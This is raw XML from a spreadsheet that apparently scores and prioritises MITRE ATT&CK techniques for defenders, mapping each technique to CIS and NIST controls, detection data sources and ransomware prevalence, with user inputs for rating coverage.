  <c r="A541" i="1"/>
  <c r="AP550" i="1"/>
  <c r="A550" i="1"/>
  <c r="AP189" i="1"/>
  <c r="A189" i="1"/>
  <c r="AP619" i="1"/>
  <c r="A619" i="1"/>
  <c r="AP170" i="1"/>
  <c r="A170" i="1"/>
  <c r="AP72" i="1"/>
  <c r="A72" i="1"/>
  <c r="AP330" i="1"/>
  <c r="A330" i="1"/>
  <c r="AP69" i="1"/>
  <c r="A69" i="1"/>
  <c r="AP539" i="1"/>
  <c r="A539" i="1"/>
  <c r="AP513" i="1"/>
  <c r="A513" i="1"/>
  <c r="AP260" i="1"/>
  <c r="A260" i="1"/>
  <c r="AP399" i="1"/>
  <c r="A399" i="1"/>
  <c r="AP423" i="1"/>
  <c r="A423" i="1"/>
  <c r="AP50" i="1"/>
  <c r="A50" i="1"/>
  <c r="AP500" i="1"/>
  <c r="A500" i="1"/>
  <c r="AP422" i="1"/>
  <c r="A422" i="1"/>
  <c r="AP340" i="1"/>
  <c r="A340" i="1"/>
  <c r="AP479" i="1"/>
  <c r="A479" i="1"/>
  <c r="AP320" i="1"/>
  <c r="A320" i="1"/>
  <c r="AP562" i="1"/>
  <c r="A562" i="1"/>
  <c r="AP43" i="1"/>
  <c r="A43" i="1"/>
  <c r="AP152" i="1"/>
  <c r="A152" i="1"/>
  <c r="AP219" i="1"/>
  <c r="A219" i="1"/>
  <c r="AP291" i="1"/>
  <c r="A291" i="1"/>
  <c r="AP261" i="1"/>
  <c r="A261" i="1"/>
  <c r="AP30" i="1"/>
  <c r="A30" i="1"/>
  <c r="AP520" i="1"/>
  <c r="A520" i="1"/>
  <c r="AP249" i="1"/>
  <c r="A249" i="1"/>
  <c r="A641" i="1"/>
  <c r="AP641" i="1"/>
  <c r="AP620" i="1"/>
  <c r="A620" i="1"/>
  <c r="AP92" i="1"/>
  <c r="A92" i="1"/>
  <c r="AP49" i="1"/>
  <c r="A49" i="1"/>
  <c r="AP391" i="1"/>
  <c r="A391" i="1"/>
  <c r="AP629" i="1"/>
  <c r="A629" i="1"/>
  <c r="AP22" i="1"/>
  <c r="A22" i="1"/>
  <c r="AP112" i="1"/>
  <c r="A112" i="1"/>
  <c r="AP589" i="1"/>
  <c r="A589" i="1"/>
  <c r="A243" i="1"/>
  <c r="AP243" i="1"/>
  <c r="AP200" i="1"/>
  <c r="A200" i="1"/>
  <c r="AP452" i="1"/>
  <c r="A452" i="1"/>
  <c r="AP561" i="1"/>
  <c r="A561" i="1"/>
  <c r="AP130" i="1"/>
  <c r="A130" i="1"/>
  <c r="AP39" i="1"/>
  <c r="A39" i="1"/>
  <c r="AP369" i="1"/>
  <c r="A369" i="1"/>
  <c r="AP382" i="1"/>
  <c r="A382" i="1"/>
  <c r="A302" i="1"/>
  <c r="AP302" i="1"/>
  <c r="AP451" i="1"/>
  <c r="A451" i="1"/>
  <c r="AP192" i="1"/>
  <c r="A192" i="1"/>
  <c r="AP600" i="1"/>
  <c r="A600" i="1"/>
  <c r="AP509" i="1"/>
  <c r="A509" i="1"/>
  <c r="AP492" i="1"/>
  <c r="A492" i="1"/>
  <c r="AP202" i="1"/>
  <c r="A202" i="1"/>
  <c r="AP529" i="1"/>
  <c r="A529" i="1"/>
  <c r="AP29" i="1"/>
  <c r="A29" i="1"/>
  <c r="AP409" i="1"/>
  <c r="A409" i="1"/>
  <c r="A371" i="1"/>
  <c r="AP371" i="1"/>
  <c r="AP162" i="1"/>
  <c r="A162" i="1"/>
  <c r="AP90" i="1"/>
  <c r="A90" i="1"/>
  <c r="AP240" i="1"/>
  <c r="A240" i="1"/>
  <c r="A379" i="1"/>
  <c r="AP379" i="1"/>
  <c r="AP311" i="1"/>
  <c r="A311" i="1"/>
  <c r="A559" i="1"/>
  <c r="AP559" i="1"/>
  <c r="AP210" i="1"/>
  <c r="A210" i="1"/>
  <c r="AP91" i="1"/>
  <c r="A91" i="1"/>
  <c r="A21" i="1"/>
  <c r="AP21" i="1"/>
  <c r="AP491" i="1"/>
  <c r="A491" i="1"/>
  <c r="A71" i="1"/>
  <c r="AP71" i="1"/>
  <c r="AP221" i="1"/>
  <c r="A221" i="1"/>
  <c r="AP220" i="1"/>
  <c r="A220" i="1"/>
  <c r="AP512" i="1"/>
  <c r="A512" i="1"/>
  <c r="AP420" i="1"/>
  <c r="A420" i="1"/>
  <c r="A421" i="1"/>
  <c r="AP421" i="1"/>
  <c r="AP212" i="1"/>
  <c r="A212" i="1"/>
  <c r="AP341" i="1"/>
  <c r="A341" i="1"/>
  <c r="AP390" i="1"/>
  <c r="A390" i="1"/>
  <c r="AP9" i="1"/>
  <c r="A9" i="1"/>
  <c r="E3" i="4" l="1" a="1"/>
  <c r="E3"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tc={C8C0DA6D-81EC-4D8E-B0EB-4EDDEC5EA839}</author>
    <author>tc={EB64C9E7-13DF-417D-96BB-2AB76B32F74D}</author>
    <author>tc={0DBD9DCC-E22C-4CA6-B2A3-5FB64D883C65}</author>
  </authors>
  <commentList>
    <comment ref="D2" authorId="0" shapeId="0" xr:uid="{C8C0DA6D-81EC-4D8E-B0EB-4EDDEC5EA839}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    Ease of Use 
Response Time 
OS Coverage (Visibility)</t>
      </text>
    </comment>
    <comment ref="C5" authorId="1" shapeId="0" xr:uid="{EB64C9E7-13DF-417D-96BB-2AB76B32F74D}">
      <text>
        <t xml:space="preserve">[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    Without the right tools or processes to aggregate and make sense of all the data, your team might not be effective yet after automating a few rules/queries. Hunters might be running queries and still get a very high amount of events that still need to be analyzed.
Tools collecting/integrating the right data (NOT JUST MORE DATA) to improve the detection of an adversary technique.
</t>
      </text>
    </comment>
    <comment ref="C6" authorId="2" shapeId="0" xr:uid="{0DBD9DCC-E22C-4CA6-B2A3-5FB64D883C65}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    Tools helping you leverage more than just simple outlier detection techniques. Here is where the capability of using advanced data science techniques are posible with the right libraries and plugins provided by your tools with access to your data (i.e Integration of Spark Analytics). (Remember, data science concepts such as machine learning might not be applicable to every single use case or technique that you are trying to detect). If you can validate the detection of an adversay technique by just applying basic data science techniques, then you might be already in the "Very Good" level.</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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="229949" uniqueCount="41484">
  <si>
    <t>BELOW IS THE CALCULATED TOP TECHNIQUE SCORE</t>
  </si>
  <si>
    <t>Top Technique Score</t>
  </si>
  <si>
    <t>TID</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Ransomware Top Technique Score</t>
  </si>
  <si>
    <t>Additional Score Added (BY USER INPUT)</t>
  </si>
  <si>
    <t>What level is your PROCESS Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>h</t>
  </si>
  <si>
    <t>What level is your NETWORK Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>What level is your FILE Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>n</t>
  </si>
  <si>
    <t>What level is your CLOUD Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t>What level is your HARDWARE Coverage? (N/L/M/H)</t>
  </si>
  <si>
    <t xml:space="preserve">OS Filter </t>
  </si>
  <si>
    <t>NIST</t>
  </si>
  <si>
    <t>CIS</t>
  </si>
  <si>
    <t>Detections</t>
  </si>
  <si>
    <t>Choke Point</t>
  </si>
  <si>
    <t>Prevalence</t>
  </si>
  <si>
    <t xml:space="preserve">Actionability </t>
  </si>
  <si>
    <t>User Input Section</t>
  </si>
  <si>
    <t>Ransomware List</t>
  </si>
  <si>
    <t>Mitigations</t>
  </si>
  <si>
    <t>Total Ransomware Top Score (Utility)</t>
  </si>
  <si>
    <t xml:space="preserve">Total Top Att&amp;ck Score </t>
  </si>
  <si>
    <t>Technique (ID)</t>
  </si>
  <si>
    <t>Technique (Name)</t>
  </si>
  <si>
    <t>Sub-technique (Name)</t>
  </si>
  <si>
    <t>Num. TID Before</t>
  </si>
  <si>
    <t>Num. TID After</t>
  </si>
  <si>
    <t>Choke Point Score</t>
  </si>
  <si>
    <t>Before Utility (unclipped)</t>
  </si>
  <si>
    <t>Before Utility</t>
  </si>
  <si>
    <t>After Utility (unclipped)</t>
  </si>
  <si>
    <t>After Utility</t>
  </si>
  <si>
    <t>Prevalence Scores</t>
  </si>
  <si>
    <t>Num. CAR</t>
  </si>
  <si>
    <t>Num. Sigma</t>
  </si>
  <si>
    <t>Num. ES SIEM</t>
  </si>
  <si>
    <t>Num. Splunk</t>
  </si>
  <si>
    <t>CIS Controls</t>
  </si>
  <si>
    <t>Num. CIS Controls</t>
  </si>
  <si>
    <t>NIST Controls</t>
  </si>
  <si>
    <t>Num. 800-53 (r5)</t>
  </si>
  <si>
    <t>Actionability Score</t>
  </si>
  <si>
    <t>Total Mitigations</t>
  </si>
  <si>
    <t>Mitigations Utility (unclipped)</t>
  </si>
  <si>
    <t>Mitigations Utility</t>
  </si>
  <si>
    <t>Total Detections</t>
  </si>
  <si>
    <t>Detections Utility (unclipped)</t>
  </si>
  <si>
    <t>Detections Utility</t>
  </si>
  <si>
    <t>Technique Status</t>
  </si>
  <si>
    <t>data sources</t>
  </si>
  <si>
    <t>Process Coverage</t>
  </si>
  <si>
    <t>Process Modifier</t>
  </si>
  <si>
    <t>Network Coverage</t>
  </si>
  <si>
    <t>Network Modifier</t>
  </si>
  <si>
    <t>File Coverage</t>
  </si>
  <si>
    <t>File Modifier</t>
  </si>
  <si>
    <t>Cloud Coverage</t>
  </si>
  <si>
    <t>Cloud Modifier</t>
  </si>
  <si>
    <t>Hardware Coverage</t>
  </si>
  <si>
    <t>Hardware Modifier</t>
  </si>
  <si>
    <t>Ransomware (Total # of ATT&amp;CK Observations)</t>
  </si>
  <si>
    <t>Total Ransomware Top Score (Utility)2</t>
  </si>
  <si>
    <t>TAT Utility (unclipped)</t>
  </si>
  <si>
    <t>TAT Utility</t>
  </si>
  <si>
    <t>Count Utility (unclipped)</t>
  </si>
  <si>
    <t>Count Utility</t>
  </si>
  <si>
    <t>Total Ransomware Top Score (Polynomial)2</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>n/a</t>
  </si>
  <si>
    <t>13.3, 13.8</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Junk Data</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>2.6, 3.11, 3.12, 4.1, 4.7, 4.8, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 11.3, 14.1, 14.3,16.1, 16.9, 18.3, 18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,CP-9,IA-2,IA-4,IA-5,SC-28,SC-39,SI-12,SI-2,SI-3,SI-4,SI-7</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</si>
  <si>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</si>
  <si>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T1003.001</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>2.6, 4.1, 4.7, 4.8, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 14.1, 14.3, 16.1, 16.9, 18.3, 18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-5,SC-28,SC-3,SC-39,SI-16,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>4.1, 4.7, 4.8, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 14.1, 14.3, 16.1, 16.9, 18.3, 18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-5,SC-28,SC-39,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>3.11, 3.12, 4.7, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 11.3, 14.1, 14.3, 16.1, 16.9</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CP-9,IA-2,IA-5,SC-28,SC-39,SI-12,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>LSA Secrets</t>
  </si>
  <si>
    <t>4.7, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 14.1, 14.3, 16.1, 16.9</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,IA-5,SC-28,SC-39,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>Cached Domain Credentials</t>
  </si>
  <si>
    <t>4.1, 4.7, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 14.1, 14.3, 16.1, 16.9, 18.3, 18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-4,IA-5,SC-28,SC-39,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,IA-4,IA-5,SC-28,SC-39,SI-3,SI-4</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>Proc Filesystem</t>
  </si>
  <si>
    <t>3.3,4.7,5.2,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>Can't Mitigate</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>13.3,13.8</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>4.1,18.3,18.5</t>
  </si>
  <si>
    <t>AC-18,CM-6,CM-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-18,CM-2,CM-6,CM-7,CM-8,RA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>Internet Connection Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Script: Script Execution</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>3.10,4.2,4.6</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-4,CA-3,CM-2,CM-6,CM-8,SC-4,SC-7,SC-8,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>4.7,5.3,6.1,6.2,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-5,CM-6,IA-2,IA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Module: Module Load, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.2,4.4,4.7,4.8,5.3,6.1,6.2,6.4,6.5,6.8,7.6,7.7,12.2,12.7,12.8,13.5,13.10,16.10,18.3,18.5</t>
  </si>
  <si>
    <t>AC-11,AC-12,AC-17,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,AC-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-5,IA-6,RA-5,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>4.1,4.2,4.4,4.5,4.7,5.2,5.3,6.1,6.2,6.8,7.6,7.7,12.2,13.4,18.2,18.3</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.4,4.5,4.8,7.7,12.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-18,SC-3,SC-46,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.7,4.8,5.3,6.1,6.2,6.4,6.5,6.8,7.6,16.10,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-2,CM-5,CM-6,CM-8,IA-2,IA-5,RA-5,SI-4</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>2.1,2.2,2.3,2.4,2.5,4.2,4.4,4.5,4.8,7.6,7.7,13.4,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-6,CA-7,CA-8,CM-11,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-6,RA-5,SC-7,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.4,4.5,4.7,4.8,5.3,5.4,6.1,6.2,6.8,7.6,7.7,12.2,12.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-23,AC-3,AC-6,CM-12,CP-9,MP-7,SA-8,SC-13,SC-28,SC-38,SC-41,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>Multiband Communication</t>
  </si>
  <si>
    <t>Deprecated</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>10.1,10.2,10.7,13.2,13.7</t>
  </si>
  <si>
    <t>CM-2,CM-6,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>File: File Metadata</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>T1027.004</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Application Log: Application Log Content</t>
  </si>
  <si>
    <t>T1027.006</t>
  </si>
  <si>
    <t>HTML Smuggling</t>
  </si>
  <si>
    <t>File: File Creation</t>
  </si>
  <si>
    <t>T1027.007</t>
  </si>
  <si>
    <t>Dynamic API Resolution</t>
  </si>
  <si>
    <t>File: File Metadata, Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1027.008</t>
  </si>
  <si>
    <t>Stripped Payloads</t>
  </si>
  <si>
    <t>T1027.009</t>
  </si>
  <si>
    <t>Embedded Payloads</t>
  </si>
  <si>
    <t>File: File Creation, File: File Metadata</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>2.5,2.7,3.3,4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,IA-9,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>Invalid Code Signature</t>
  </si>
  <si>
    <t>2.7,4.1</t>
  </si>
  <si>
    <t>CM-2,CM-6,IA-9,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>Right-to-Left Override</t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>Rename System Utilities</t>
  </si>
  <si>
    <t>3.3,4.1,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-6,CA-7,CM-2,CM-6,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>Masquerade Task or Service</t>
  </si>
  <si>
    <t>Command: Command Execution, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>File: File Metadata, Image: Image Metadata, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1036.006</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>T1036.007</t>
  </si>
  <si>
    <t>Double File Extension</t>
  </si>
  <si>
    <t>CA-7,CM-2,CM-6,CM-7,IA-2,SI-4</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>2.7,3.3,4.1,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-17,AC-3,CA-7,CM-2,CM-6,CM-7,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>AC-17,CM-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Logon Script (Mac)</t>
  </si>
  <si>
    <t>AC-3,CA-7,CM-2,CM-6,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>Network Logon Script</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>2.7,3.3,4.1,6.1,6.2</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>4.2,4.6,6.4,6.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,IA-2,IA-5,SC-4,SC-8,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-4,AC-6,CA-3,CA-7,SA-8,SA-9,SC-13,SC-28,SC-31,SC-7,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
